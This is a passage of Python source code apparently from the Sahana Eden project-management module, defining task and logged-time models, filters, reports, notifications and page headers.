crud_strings[tablename] = Storage(
title_create = ADD_TIME,
title_display = T("Logged Time Details"),
title_list = T("Logged Time"),
title_update = T("Edit Logged Time"),
title_search = T("Search Logged Time"),
title_upload = T("Import Logged Time data"),
title_report = T("Project Time Report"),
subtitle_create = T("Log New Time"),
label_list_button = T("List Logged Time"),
label_create_button = ADD_TIME,
msg_record_created = T("Time Logged"),
msg_record_modified = T("Time Log Updated"),
msg_record_deleted = T("Time Log Deleted"),
msg_list_empty = T("No Time Logged")
)
if "rows" in request.get_vars and request.get_vars.rows == "project":
crud_strings[tablename].title_report = T("Project Time Report")
list_fields = ["id",
(T("Project"), "task_id$task_project.project_id"),
(T("Activity"), "task_id$task_activity.activity_id"),
"task_id",
"person_id",
"date",
"hours",
"comments",
]
# Virtual Fields
table.day = Field.Lazy(project_time_day)
table.week = Field.Lazy(project_time_week)
filter_widgets = [
S3OptionsFilter("person_id",
label=T("Person"),
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("task_id$task_project.project_id",
label=T("Project"),
options = self.project_task_project_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
),
S3OptionsFilter("task_id$task_activity.activity_id",
label=T("Activity"),
options = self.project_task_activity_opts,
#represent="%(name)s",
#widget="multiselect",
cols=3,
hidden=True,
),
S3DateFilter("date",
label=T("Date"),
hide_time=True,
hidden=True,
),
]
if settings.get_project_milestones():
# Use the field in this format to get the custom represent
list_fields.insert(3, (T("Milestone"), "task_id$task_milestone.milestone_id"))
filter_widgets.insert(3, S3OptionsFilter("task_id$task_milestone.milestone_id",
label = T("Milestone"),
cols = 3,
hidden = True,
))
report_fields = list_fields + \
[(T("Day"), "day"),
(T("Week"), "week")]
if settings.get_project_sectors():
report_fields.insert(3, (T("Sector"),
"task_id$task_project.project_id$sector_project.sector_id"))
def get_sector_opts():
stable = self.org_sector
rows = db(stable.deleted == False).select(stable.id, stable.name)
sector_opts = {}
for row in rows:
sector_opts[row.id] = row.name
return sector_opts
filter_widgets.insert(1, S3OptionsFilter("task_id$task_project.project_id$sector_project.sector_id",
label = T("Sector"),
options = get_sector_opts,
cols = 3,
))
# Custom Methods
set_method("project", "time",
method="effort",
action=self.project_time_effort_report)
configure(tablename,
onaccept=self.project_time_onaccept,
filter_widgets=filter_widgets,
report_fields=["date"],
report_options=Storage(
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(
rows="task_id$task_project.project_id",
cols="person_id",
fact="sum(hours)",
totals=True
),
),
list_fields=list_fields
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
project_task_id = task_id,
project_task_active_statuses = project_task_active_statuses,
project_task_represent_w_project = self.project_task_represent_w_project,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_task_id = lambda: dummy("task_id"),
project_task_active_statuses = [],
)
# -------------------------------------------------------------------------
@staticmethod
def project_task_task_id(row):
""" The record ID of a task as separate column in the data table """
if hasattr(row, "project_task"):
row = row.project_task
try:
return row.id
except AttributeError:
return None
# -------------------------------------------------------------------------
@staticmethod
def project_task_project_opts():
"""
Provide the options for the Project search filter
- all Projects with Tasks
"""
db = current.db
ptable = db.project_project
ttable = db.project_task
ltable = db.project_task_project
query = (ttable.deleted != True) & \
(ltable.task_id == ttable.id) & \
(ltable.project_id == ptable.id)
rows = db(query).select(ptable.id, ptable.name)
return dict([(row.id, row.name) for row in rows])
# -------------------------------------------------------------------------
@staticmethod
def project_task_activity_opts():
"""
Provide the options for the Activity search filter
- all Activities with Tasks
"""
db = current.db
atable = db.project_activity
ttable = db.project_task
ltable = db.project_task_activity
query = (ttable.deleted == False) & \
(ltable.task_id == ttable.id) & \
(ltable.activity_id == atable.id)
opts = db(query).select(atable.name)
_dict = {}
for opt in opts:
_dict[opt.name] = opt.name
return _dict
# -------------------------------------------------------------------------
@staticmethod
def project_task_milestone_opts():
"""
Provide the options for the Milestone search filter
- all Activities with Tasks
"""
db = current.db
mtable = db.project_milestone
ttable = db.project_task
ltable = db.project_task_milestone
query = (ttable.deleted == False) & \
(ltable.task_id == ttable.id) & \
(ltable.milestone_id == mtable.id)
opts = db(query).select(mtable.name)
_dict = {}
for opt in opts:
_dict[opt.name] = opt.name
return _dict
# -------------------------------------------------------------------------
@staticmethod
def project_assignee_represent(id, row=None):
""" FK representation """
if row:
id = row.pe_id
instance_type = row.instance_type
elif id:
if isinstance(id, Row):
instance_type = id.instance_type
id = id.pe_id
else:
instance_type = None
else:
return current.messages["NONE"]
db = current.db
s3db = current.s3db
if not instance_type:
table = s3db.pr_pentity
r = db(table._id == id).select(table.instance_type,
limitby=(0, 1)).first()
instance_type = r.instance_type
if instance_type == "pr_person":
# initials?
return s3_fullname(pe_id=id) or current.messages.UNKNOWN_OPT
elif instance_type in ("pr_group", "org_organisation"):
# Team or Organisation
table = s3db[instance_type]
r = db(table.pe_id == id).select(table.name,
limitby=(0, 1)).first()
try:
return r.name
except:
return current.messages.UNKNOWN_OPT
else:
return current.messages.UNKNOWN_OPT
# ---------------------------------------------------------------------
@staticmethod
def project_task_represent(id, row=None, show_link=True,
show_project=False):
""" FK representation """
if row:
represent = row.name
if show_project:
db = current.db
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == row.id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s (%s)" % (represent, project.name)
if show_link:
return A(represent,
_href=URL(c="project", f="task", extension="html",
args=[row.id]))
return represent
elif not id:
return current.messages["NONE"]
db = current.db
table = db.project_task
r = db(table.id == id).select(table.name,
limitby=(0, 1)).first()
try:
represent = r.name
except:
return current.messages.UNKNOWN_OPT
else:
if show_project:
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s (%s)" % (represent, project.name)
if show_link:
return A(represent,
_href=URL(c="project", f="task", extension="html",
args=[id]))
return represent
# ---------------------------------------------------------------------
@staticmethod
def project_task_represent_w_project(id, row=None):
"""
FK representation
The show_project=True in the normal represent doesn't work as a lambda in IS_ONE_OF
"""
if row:
db = current.db
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == row.id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s: %s" % (project.name, row.name)
else:
represent = represent = "- %s" % row.name
return represent
elif not id:
return current.messages["NONE"]
db = current.db
table = db.project_task
r = db(table.id == id).select(table.name,
limitby=(0, 1)).first()
try:
name = r.name
except:
return current.messages.UNKNOWN_OPT
else:
ltable = db.project_task_project
ptable = db.project_project
query = (ltable.task_id == id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.name,
limitby=(0, 1)).first()
if project:
represent = "%s: %s" % (project.name, name)
else:
represent = "- %s" % name
return represent
# -------------------------------------------------------------------------
@staticmethod
def project_task_realm_entity(table, record):
""" Set the task realm entity to the project's realm entity """
task_id = record.id
db = current.db
ptable = db.project_project
ltable = db.project_task_project
query = (ltable.task_id == task_id) & \
(ltable.project_id == ptable.id)
project = db(query).select(ptable.realm_entity,
limitby=(0, 1)).first()
if project:
return project.realm_entity
else:
return None
# -------------------------------------------------------------------------
@staticmethod
def project_task_onvalidation(form):
""" Task form validation """
vars = form.vars
if str(vars.status) == "3" and not vars.pe_id:
form.errors.pe_id = \
current.T("Status 'assigned' requires the %(fieldname)s to not be blank") % \
dict(fieldname=current.db.project_task.pe_id.label)
elif vars.pe_id and str(vars.status) == "2":
# Set the Status to 'Assigned' if left at default 'New'
vars.status = 3
return
# -------------------------------------------------------------------------
@staticmethod
def project_task_create_onaccept(form):
"""
When a Task is created:
* Process the additional fields: Project/Activity/Milestone
* create associated Link Table records
* notify assignee
"""
db = current.db
s3db = current.s3db
session = current.session
id = form.vars.id
if session.s3.event:
# Create a link between this Task & the active Event
etable = s3db.event_task
etable.insert(event_id=session.s3.event,
task_id=id)
ltp = db.project_task_project
vars = current.request.post_vars
project_id = vars.get("project_id", None)
if project_id:
# Create Link to Project
link_id = ltp.insert(task_id = id,
project_id = project_id)
activity_id = vars.get("activity_id", None)
if activity_id:
# Create Link to Activity
lta = db.project_task_activity
link_id = lta.insert(task_id = id,
activity_id = activity_id)
milestone_id = vars.get("milestone_id", None)
if milestone_id:
# Create Link to Milestone
ltable = db.project_task_milestone
link_id = ltable.insert(task_id = id,
milestone_id = milestone_id)
# Make sure the task is also linked to the project
# when created under an activity
row = db(ltp.task_id == id).select(ltp.project_id,
limitby=(0, 1)).first()
if not row:
lta = db.project_task_activity
ta = db.project_activity
query = (lta.task_id == id) & \
(lta.activity_id == ta.id)
row = db(query).select(ta.project_id,
limitby=(0, 1)).first()
if row and row.project_id:
ltp.insert(task_id=id,
project_id=row.project_id)
# Notify Assignee
task_notify(form)
return
# -------------------------------------------------------------------------
@staticmethod
def project_task_update_onaccept(form):
"""
* Process the additional fields: Project/Activity/Milestone
* Log changes as comments
* If the task is assigned to someone then notify them
"""
db = current.db
s3db = current.s3db
vars = form.vars
id = vars.id
record = form.record
table = db.project_task
changed = {}
if record: # Not True for a record merger
for var in vars:
vvar = vars[var]
rvar = record[var]
if vvar != rvar:
type = table[var].type
if type == "integer" or \
type.startswith("reference"):
if vvar:
vvar = int(vvar)
if vvar == rvar:
continue
represent = table[var].represent
if not represent:
represent = lambda o: o
if rvar:
changed[var] = "%s changed from %s to %s" % \
(table[var].label, represent(rvar), represent(vvar))
else:
changed[var] = "%s changed to %s" % \
(table[var].label, represent(vvar))
if changed:
table = db.project_comment
text = s3_auth_user_represent(current.auth.user.id)
for var in changed:
text = "%s\n%s" % (text, changed[var])
table.insert(task_id=id,
body=text)
vars = current.request.post_vars
if "project_id" in vars:
ltable = db.project_task_project
filter = (ltable.task_id == id)
project = vars.project_id
if project:
# Create the link to the Project
#ptable = db.project_project
#master = s3db.resource("project_task", id=id)
#record = db(ptable.id == project).select(ptable.id,
# limitby=(0, 1)).first()
#link = s3db.resource("project_task_project")
#link_id = link.update_link(master, record)
query = (ltable.task_id == id) & \
(ltable.project_id == project)
record = db(query).select(ltable.id, limitby=(0, 1)).first()
if record:
link_id = record.id
else:
link_id = ltable.insert(task_id = id,
project_id = project)
filter = filter & (ltable.id != link_id)
# Remove any other links
links = s3db.resource("project_task_project", filter=filter)
ondelete = s3db.get_config("project_task_project", "ondelete")
links.delete(ondelete=ondelete)
if "activity_id" in vars:
ltable = db.project_task_activity
filter = (ltable.task_id == id)
activity = vars.activity_id
if vars.activity_id:
# Create the link to the Activity
#atable = db.project_activity
#master = s3db.resource("project_task", id=id)
#record = db(atable.id == activity).select(atable.id,
# limitby=(0, 1)).first()
#link = s3db.resource("project_task_activity")
#link_id = link.update_link(master, record)
query = (ltable.task_id == id) & \
(ltable.activity_id == activity)
record = db(query).select(ltable.id, limitby=(0, 1)).first()
if record:
link_id = record.id
else:
link_id = ltable.insert(task_id = id,
activity_id = activity)
filter = filter & (ltable.id != link_id)
# Remove any other links
links = s3db.resource("project_task_activity", filter=filter)
ondelete = s3db.get_config("project_task_activity", "ondelete")
links.delete(ondelete=ondelete)
if "milestone_id" in vars:
ltable = db.project_task_milestone
filter = (ltable.task_id == id)
milestone = vars.milestone_id
if milestone:
# Create the link to the Milestone
#mtable = db.project_milestone
#master = s3db.resource("project_task", id=id)
#record = db(mtable.id == milestone).select(mtable.id,
# limitby=(0, 1)).first()
#link = s3db.resource("project_task_milestone")
#link_id = link.update_link(master, record)
query = (ltable.task_id == id) & \
(ltable.milestone_id == milestone)
record = db(query).select(ltable.id, limitby=(0, 1)).first()
if record:
link_id = record.id
else:
link_id = ltable.insert(task_id = id,
milestone_id = milestone)
filter = filter & (ltable.id != link_id)
# Remove any other links
links = s3db.resource("project_task_milestone", filter=filter)
ondelete = s3db.get_config("project_task_milestone", "ondelete")
links.delete(ondelete=ondelete)
# Notify Assignee
task_notify(form)
return
# -------------------------------------------------------------------------
@staticmethod
def project_task_dispatch(r, **attr):
"""
Send a Task Dispatch notice from a Task
- if a location is supplied, this will be formatted as an OpenGeoSMS
"""
if r.representation == "html" and \
r.name == "task" and r.id and not r.component:
record = r.record
text = "%s: %s" % (record.name,
record.description)
# Encode the message as an OpenGeoSMS
msg = current.msg
message = msg.prepare_opengeosms(record.location_id,
code="ST",
map="google",
text=text)
# URL to redirect to after message sent
url = URL(c="project",
f="task",
args=r.id)
# Create the form
if record.pe_id:
opts = dict(recipient=record.pe_id)
else:
opts = dict(recipient_type="pr_person")
output = msg.compose(type="SMS",
message = message,
url = url,
**opts)
# Maintain RHeader for consistency
if "rheader" in attr:
rheader = attr["rheader"](r)
if rheader:
output["rheader"] = rheader
output["title"] = current.T("Send Task Notification")
current.response.view = "msg/compose.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# -------------------------------------------------------------------------
@staticmethod
def project_milestone_duplicate(item):
""" Import item de-duplication """
if item.tablename == "project_milestone":
data = item.data
table = item.table
# Duplicate if same Name & Project
if "name" in data and data.name:
query = (table.name.lower() == data.name.lower())
else:
# Nothing we can work with
return
if "project_id" in data and data.project_id:
query &= (table.project_id == data.project_id)
duplicate = current.db(query).select(table.id,
limitby=(0, 1)).first()
if duplicate:
item.id = duplicate.id
item.method = item.METHOD.UPDATE
return
# -------------------------------------------------------------------------
@staticmethod
def project_time_onaccept(form):
""" When Time is logged, update the Task & Activity """
db = current.db
titable = db.project_time
ttable = db.project_task
atable = db.project_activity
tatable = db.project_task_activity
# Find the Task
task_id = form.vars.task_id
if not task_id:
# Component Form
query = (titable.id == form.vars.id)
record = db(query).select(titable.task_id,
limitby=(0, 1)).first()
if record:
task_id = record.task_id
# Total the Hours Logged
query = (titable.deleted == False) & \
(titable.task_id == task_id)
rows = db(query).select(titable.hours)
hours = 0
for row in rows:
if row.hours:
hours += row.hours
# Update the Task
query = (ttable.id == task_id)
db(query).update(time_actual=hours)
# Find the Activity
query = (tatable.deleted == False) & \
(tatable.task_id == task_id)
activity = db(query).select(tatable.activity_id,
limitby=(0, 1)).first()
if activity:
activity_id = activity.activity_id
# Find all Tasks in this Activity
query = (ttable.deleted == False) & \
(tatable.deleted == False) & \
(tatable.task_id == ttable.id) & \
(tatable.activity_id == activity_id)
tasks = db(query).select(ttable.time_actual)
# Total the Hours Logged
hours = 0
for task in tasks:
hours += task.time_actual or 0 # Handle None
# Update the Activity
query = (atable.id == activity_id)
db(query).update(time_actual=hours)
return
# -------------------------------------------------------------------------
@staticmethod
def project_time_effort_report(r, **attr):
"""
Provide a Report on Effort by week
@ToDo: https://sahana.mybalsamiq.com/projects/sandbox/Effort
"""
if r.representation == "html":
T = current.T
request = current.request
resource = r.resource
output = {}
from s3.s3data import S3PivotTable
rows = "person_id"
cols = "week"
layers = [("hours", "sum")]
pivot = S3PivotTable(resource, rows, cols, layers)
_table = pivot.html()
output["items"] = _table
output["title"] = T("Effort Report")
current.response.view = "list.html"
return output
else:
raise HTTP(501, current.messages.BADMETHOD)
# =============================================================================
class S3ProjectTaskHRMModel(S3Model):
"""
Project Task HRM Model
This class holds the tables used to link Tasks to Human Resources
- either individuals or Job Roles
"""
names = ["project_task_job_title",
"project_task_human_resource",
]
def model(self):
define_table = self.define_table
task_id = self.project_task_id
# ---------------------------------------------------------------------
# Link Tasks <> Human Resources
tablename = "project_task_human_resource"
table = define_table(tablename,
task_id(),
self.hrm_human_resource_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Link Tasks <> Job Roles
tablename = "project_task_job_title"
table = define_table(tablename,
task_id(),
self.hrm_job_title_id(),
*s3_meta_fields())
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
)
# =============================================================================
class S3ProjectTaskIReportModel(S3Model):
"""
Project Task IReport Model
This class holds the table used to link Tasks with Incident Reports.
@ToDo: Link to Incidents instead?
"""
names = ["project_task_ireport",
]
def model(self):
# Link Tasks <-> Incident Reports
#
tablename = "project_task_ireport"
table = self.define_table(tablename,
self.project_task_id(),
self.irs_ireport_id(),
*s3_meta_fields())
self.configure(tablename,
onaccept=self.task_ireport_onaccept)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict(
)
# -------------------------------------------------------------------------
@staticmethod
def task_ireport_onaccept(form):
"""
When a Task is linked to an IReport, then populate the location_id
"""
vars = form.vars
ireport_id = vars.ireport_id
task_id = vars.task_id
db = current.db
# Check if we already have a Location for the Task
table = db.project_task
query = (table.id == task_id)
record = db(query).select(table.location_id,
limitby=(0, 1)).first()
if not record or record.location_id:
return
# Find the Incident Location
itable = db.irs_ireport
query = (itable.id == ireport_id)
record = db(query).select(itable.location_id,
limitby=(0, 1)).first()
if not record or not record.location_id:
return
location_id = record.location_id
# Update the Task
query = (table.id == task_id)
db(query).update(location_id=location_id)
return
# =============================================================================
def multi_theme_percentage_represent(id):
"""
Representation for Theme Percentages
for multiple=True options
"""
if not id:
return current.messages["NONE"]
s3db = current.s3db
table = s3db.project_theme_percentage
ttable = s3db.project_theme
def represent_row(row):
return "%s (%s%s)" % (row.project_theme.name,
row.project_theme_percentage.percentage,
"%")
if isinstance(id, (list, tuple)):
query = (table.id.belongs(id)) & \
(ttable.id == table.theme_id)
rows = current.db(query).select(table.percentage,
ttable.name)
repr = ", ".join(represent_row(row) for row in rows)
return repr
else:
query = (table.id == id) & \
(ttable.id == table.theme_id)
row = current.db(query).select(table.percentage,
ttable.name).first()
try:
return represent_row(row)
except:
return current.messages.UNKNOWN_OPT
# =============================================================================
class project_LocationRepresent(S3Represent):
""" Representation of Project Locations """
def __init__(self,
translate=False,
show_link=False,
multiple=False,
):
settings = current.deployment_settings
if settings.get_project_community():
# Community is the primary resource
self.community = True
else:
# Location is just a way to display Projects on a map
self.community = False
if settings.get_gis_countries() == 1:
self.multi_country = False
else:
self.multi_country = True
self.use_codes = settings.get_project_codes()
self.lookup_rows = self.custom_lookup_rows
super(project_LocationRepresent,
self).__init__(lookup="project_location",
show_link=show_link,
translate=translate,
multiple=multiple)
# -------------------------------------------------------------------------
def custom_lookup_rows(self, key, values, fields=None):
"""
Custom lookup method for organisation rows, does a
join with the projects and locations. Parameters
key and fields are not used, but are kept for API
compatiblity reasons.
@param values: the project_location IDs
"""
db = current.db
ltable = current.s3db.project_location
gtable = db.gis_location
fields = [ltable.id, # pkey is needed for the cache
gtable.name,
gtable.level,
gtable.L0,
gtable.L1,
gtable.L2,
gtable.L3,
gtable.L4,
gtable.L5,
]
if len(values) == 1:
query = (ltable.id == values[0]) & \
(ltable.location_id == gtable.id)
limitby = (0, 1)
else:
query = (ltable.id.belongs(values)) & \
(ltable.location_id == gtable.id)
limitby = None
if not self.community:
ptable = db.project_project
query &= (ltable.project_id == ptable.id)
fields.append(ptable.name)
if self.use_codes:
fields.append(ptable.code)
rows = db(query).select(*fields,
limitby=limitby)
self.queries += 1
return rows
# -------------------------------------------------------------------------
def represent_row(self, row):
"""
Represent a single Row
@param row: the joined Row
"""
community = self.community
if not self.community:
prow = row["project_project"]
row = row["gis_location"]
name = row.name
level = row.level
if level == "L0":
location = name
else:
locations = [name]
lappend = locations.append
matched = False
L5 = row.L5
if L5:
if L5 == name:
matched = True
else:
lappend(L5)
L4 = row.L4
if L4:
if L4 == name:
if matched:
lappend(L4)
matched = True
else:
lappend(L4)
L3 = row.L3
if L3:
if L3 == name:
if matched:
lappend(L3)
matched = True
else:
lappend(L3)
L2 = row.L2
if L2:
if L2 == name:
if matched:
lappend(L2)
matched = True
else:
lappend(L2)
L1 = row.L1
if L1:
if L1 == name:
if matched:
lappend(L1)
matched = True
else:
lappend(L1)
if self.multi_country:
L0 = row.L0
if L0:
if L0 == name:
if matched:
lappend(L0)
matched = True
else:
lappend(L0)
location = ", ".join(locations)
if community:
return s3_unicode(location)
else:
if self.use_codes and prow.code:
project = "%s: %s" % (prow.code, prow.name)
else:
project = prow.name
name = "%s (%s)" % (project, location)
return s3_unicode(name)
# =============================================================================
def task_notify(form):
"""
If the task is assigned to someone then notify them
"""
vars = form.vars
pe_id = vars.pe_id
if not pe_id:
return
user = current.auth.user
if user and user.pe_id == pe_id:
# Don't notify the user when they assign themselves tasks
return
if int(vars.status) not in current.response.s3.project_task_active_statuses:
# No need to notify about closed tasks
return
if form.record is None or (int(pe_id) != form.record.pe_id):
# Assignee has changed
settings = current.deployment_settings
if settings.has_module("msg"):
# Notify assignee
subject = "%s: Task assigned to you" % settings.get_system_name_short()
url = "%s%s" % (settings.get_base_public_url(),
URL(c="project", f="task", args=vars.id))
priority = current.s3db.project_task.priority.represent(int(vars.priority))
message = "You have been assigned a Task:\n\n%s\n\n%s\n\n%s\n\n%s" % \
(url,
"%s priority" % priority,
vars.name,
vars.description or "")
current.msg.send_by_pe_id(pe_id, subject, message)
return
# =============================================================================
class S3ProjectThemeVirtualFields:
""" Virtual fields for the project table """
def themes(self):
"""
Themes associated with this Project
"""
try:
project_id = self.project_project.id
except AttributeError:
return ""
s3db = current.s3db
ptable = s3db.project_project
ttable = s3db.project_theme
ltable = s3db.project_theme_percentage
query = (ltable.deleted != True) & \
(ltable.project_id == project_id) & \
(ltable.theme_id == ttable.id)
themes = current.db(query).select(ttable.name,
ltable.percentage)
if not themes:
return current.messages["NONE"]
represent = ""
for theme in themes:
name = theme.project_theme.name
percentage = theme.project_theme_percentage.percentage
if represent:
represent = "%s, %s (%s%s)" % (represent,
name,
percentage,
"%")
else:
represent = "%s (%s%s)" % (name, percentage, "%")
return represent
# =============================================================================
# project_time virtual fields
#
def project_time_day(row):
"""
Virtual field for project_time - abbreviated string format for
date, allows grouping per day instead of the individual datetime,
used for project time report.
Requires "date" to be in the additional report_fields
@param row: the Row
"""
try:
thisdate = row["project_time.date"]
except AttributeError:
return current.messages["NONE"]
if not thisdate:
return current.messages["NONE"]
now = current.request.utcnow
week = datetime.timedelta(days=7)
#if thisdate < (now - week):
# Ignore data older than the last week
# - should already be filtered in controller anyway
# return default
return thisdate.date().strftime("%d %B %y")
# =============================================================================
def project_time_week(row):
"""
Virtual field for project_time - returns the date of the Monday
(=first day of the week) of this entry, used for project time report.
Requires "date" to be in the additional report_fields
@param row: the Row
"""
try:
thisdate = row["project_time.date"]
except AttributeError:
return current.messages["NONE"]
if not thisdate:
return current.messages["NONE"]
day = thisdate.date()
monday = day - datetime.timedelta(days=day.weekday())
return monday
# =============================================================================
def project_ckeditor():
""" Load the Project Comments JS """
s3 = current.response.s3
ckeditor = URL(c="static", f="ckeditor", args="ckeditor.js")
s3.scripts.append(ckeditor)
adapter = URL(c="static", f="ckeditor", args=["adapters", "jquery.js"])
s3.scripts.append(adapter)
# Toolbar options: http://docs.cksource.com/CKEditor_3.x/Developers_Guide/Toolbar
# @ToDo: Move to Static
js = "".join((
'''i18n.reply="''', str(current.T("Reply")), '''"
var img_path=S3.Ap.concat('/static/img/jCollapsible/')
var ck_config={toolbar:[['Bold','Italic','-','NumberedList','BulletedList','-','Link','Unlink','-','Smiley','-','Source','Maximize']],toolbarCanCollapse:false,removePlugins:'elementspath'}
function comment_reply(id){
$('#project_comment_task_id__row').hide()
$('#project_comment_task_id__row1').hide()
$('#comment-title').html(i18n.reply)
$('#project_comment_body').ckeditorGet().destroy()
$('#project_comment_body').ckeditor(ck_config)
$('#comment-form').insertAfter($('#comment-'+id))
$('#project_comment_parent').val(id)
var task_id = $('#comment-'+id).attr('task_id')
$('#project_comment_task_id').val(task_id)
}'''))
s3.js_global.append(js)
# =============================================================================
def project_rheader(r):
""" Project Resource Headers - used in Project & Budget modules """
if r.representation != "html":
# RHeaders only used in interactive views
return None
# Need to use this as otherwise demographic_data?viewing=project_location.x
# doesn't have an rheader
tablename, record = s3_rheader_resource(r)
if not record:
return None
s3db = current.s3db
table = s3db.table(tablename)
resourcename = r.name
T = current.T
auth = current.auth
settings = current.deployment_settings
attachments_label = settings.get_ui_label_attachments()
if resourcename == "project":
mode_3w = settings.get_project_mode_3w()
mode_task = settings.get_project_mode_task()
# Tabs
ADMIN = current.session.s3.system_roles.ADMIN
admin = auth.s3_has_role(ADMIN)
#staff = auth.s3_has_role("STAFF")
staff = True
tabs = [(T("Basic Details"), None)]
append = tabs.append
if settings.get_project_multiple_organisations():
append((T("Organizations"), "organisation"))
if settings.get_project_theme_percentages():
append((T("Themes"), "theme"))
if mode_3w:
if settings.get_project_community():
append((T("Communities"), "location"))
else:
append((T("Locations"), "location"))
append((T("Beneficiaries"), "beneficiary"))
if settings.get_project_milestones():
append((T("Milestones"), "milestone"))
if settings.get_project_activities():
append((T("Activities"), "activity"))
if mode_task:
append((T("Tasks"), "task"))
if record.calendar:
append((T("Calendar"), "timeline"))
if settings.get_project_multiple_budgets():
append((T("Annual Budgets"), "annual_budget"))
if mode_3w:
append((T("Documents"), "document"))
else:
append((attachments_label, "document"))
if settings.get_hrm_show_staff():
append((T("Staff"), "human_resource", dict(group="staff")))
if settings.has_module("vol"):
append((T("Volunteers"), "human_resource", dict(group="volunteer")))
rheader_fields = [["code", "name"],
["organisation_id"],
["start_date", "end_date"]
]
rheader = S3ResourceHeader(rheader_fields, tabs)(r)
elif resourcename in ["location", "demographic_data"]:
tabs = [(T("Details"), None),
(T("Beneficiaries"), "beneficiary"),
(T("Demographics"), "demographic_data/"),
(T("Contact People"), "contact"),
]
rheader_fields = []
if record.project_id is not None:
rheader_fields.append(["project_id"])
rheader_fields.append(["location_id"])
rheader = S3ResourceHeader(rheader_fields, tabs)(r,
record = record,
table = table)
elif resourcename == "framework":
tabs = [(T("Details"), None),
(T("Organizations"), "organisation"),
(T("Documents"), "document")]
rheader_fields = [["name"]]
rheader = S3ResourceHeader(rheader_fields, tabs)(r)
elif resourcename == "activity":
tabs = [(T("Details"), None),
(T("Contact People"), "contact")]
if settings.get_project_mode_task():
tabs.append((T("Tasks"), "task"))
tabs.append((attachments_label, "document"))
else:
tabs.append((T("Documents"), "document"))
rheader_fields = []
if record.project_id is not None:
rheader_fields.append(["project_id"])
rheader_fields.append(["name"])
rheader_fields.append(["location_id"])
rheader = S3ResourceHeader(rheader_fields, tabs)(r)
elif resourcename == "task":
# Tabs
tabs = [(T("Details"), None)]
append = tabs.append
append((attachments_label, "document"))
if settings.has_module("msg"):
append((T("Notify"), "dispatch"))
#(T("Roles"), "job_title"),
#(T("Assignments"), "human_resource"),
#(T("Requests"), "req")
rheader_tabs = s3_rheader_tabs(r, tabs)
# RHeader
db = current.db
ltable = s3db.project_task_project
ptable = db.project_project
query = (ltable.deleted == False) & \
(ltable.task_id == r.id) & \
(ltable.project_id == ptable.id)
row = db(query).select(ptable.id,
ptable.code,
ptable.name,
limitby=(0, 1)).first()
if row:
project = s3db.project_project_represent(None, row)
project = TR(TH("%s: " % T("Project")),
project,
)
else:
project = ""
atable = s3db.project_activity
ltable = s3db.project_task_activity
query = (ltable.deleted == False) & \
(ltable.task_id == r.id) & \
(ltable.activity_id == atable.id)
activity = db(query).select(atable.name,
limitby=(0, 1)).first()
if activity:
activity = TR(TH("%s: " % T("Activity")),
activity.name
)
else:
activity = ""
if record.description:
description = TR(TH("%s: " % table.description.label),
record.description
)
else:
description = ""
if record.site_id:
facility = TR(TH("%s: " % table.site_id.label),
table.site_id.represent(record.site_id),
)
else:
facility = ""
if record.location_id:
location = TR(TH("%s: " % table.location_id.label),
table.location_id.represent(record.location_id),
)
else:
location = ""
if record.created_by:
creator = TR(TH("%s: " % T("Created By")),
s3_auth_user_represent(record.created_by),
)
else:
creator = ""
if record.time_estimated:
time_estimated = TR(TH("%s: " % table.time_estimated.label),
record.time_estimated
)
else:
time_estimated = ""
if record.time_actual:
time_actual = TR(TH("%s: " % table.time_actual.label),
record.time_actual
)
else:
time_actual = ""
rheader = DIV(TABLE(project,
activity,
TR(TH("%s: " % table.name.label),
record.name,
),
description,
facility,
location,
creator,
time_estimated,
time_actual,
#comments,
), rheader_tabs)
return rheader
# =============================================================================
def project_task_form_inject(r, output, project=True):
"""
Inject Project, Activity & Milestone fields into a Task form
@ToDo: Re-implement using http://eden.sahanafoundation.org/wiki/S3SQLForm
"""
T = current.T
db = current.db
s3db = current.s3db
auth = current.auth
s3 = current.response.s3
settings = current.deployment_settings
sep = ": "
s3_formstyle = settings.get_ui_formstyle()
table = s3db.project_task_activity
field = table.activity_id
default = None
if r.component_id:
query = (table.task_id == r.component_id)
default = db(query).select(field,
limitby=(0, 1)).first()
if default:
default = default.activity_id
elif r.id:
query = (table.task_id == r.id)
default = db(query).select(field,
limitby=(0, 1)).first()
if default:
default = default.activity_id
if not default:
default = field.default
field_id = "%s_%s" % (table._tablename, field.name)
if r.component:
requires = {}
table = db.project_activity
query = (table.project_id == r.id)
rows = db(query).select(table.id, table.name)
for row in rows:
requires[row.id] = row.name
field.requires = IS_IN_SET(requires)
else:
if default:
field.requires = IS_IN_SET([default])
else:
field.requires = IS_IN_SET([])
widget = SQLFORM.widgets.options.widget(field, default)
label = field.label
label = LABEL(label, label and sep, _for=field_id,
_id=field_id + SQLFORM.ID_LABEL_SUFFIX)
comment = S3AddResourceLink(T("Add Activity"),
c="project",
f="activity",
tooltip=T("If you don't see the activity in the list, you can add a new one by clicking link 'Add Activity'."))
if project:
options = {"triggerName": "project_id",
"targetName": "activity_id",
"lookupPrefix": "project",
"lookupResource": "activity",
"optional": True,
}
s3.jquery_ready.append('''S3OptionsFilter(%s)''' % json.dumps(options))
row_id = field_id + SQLFORM.ID_ROW_SUFFIX
row = s3_formstyle(row_id, label, widget, comment)
try:
output["form"][0].insert(0, row[1])
except:
# A non-standard formstyle with just a single row
pass
try:
output["form"][0].insert(0, row[0])
except:
